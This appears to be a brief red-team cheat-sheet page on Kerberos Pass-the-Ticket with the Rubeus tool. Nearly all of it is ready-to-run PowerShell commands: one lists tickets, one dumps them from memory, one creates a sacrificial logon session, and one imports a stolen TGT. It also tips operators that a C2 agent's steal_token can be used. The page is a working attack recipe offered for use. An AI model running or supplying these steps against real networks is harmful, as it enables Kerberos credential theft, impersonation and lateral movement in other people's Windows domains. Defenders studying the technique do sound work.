Pass-the-Ticket

Rubeus

Show Kerberos tickets in all logon sessions if elevated (otherwise it will only show tickets in current logon session):

PS > .\Rubeus.exe triage

Extract the tickets from memory:

PS > .\Rubeus.exe dump [/service:krbtgt] [/luid:0x1337] /nowrap

Create a sacrificial process (Logon type 9) and import the TGT into its logon session:

PS > .\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /show
PS > .\Rubeus.exe ptt /luid:0x1337 /ticket:<BASE64_TICKET>

If operating Rubeus from a C2 agent, you can steal_token instead of using /show option.

You can also extract and reuse TGS tickets with this technique.

Last updated 2 years ago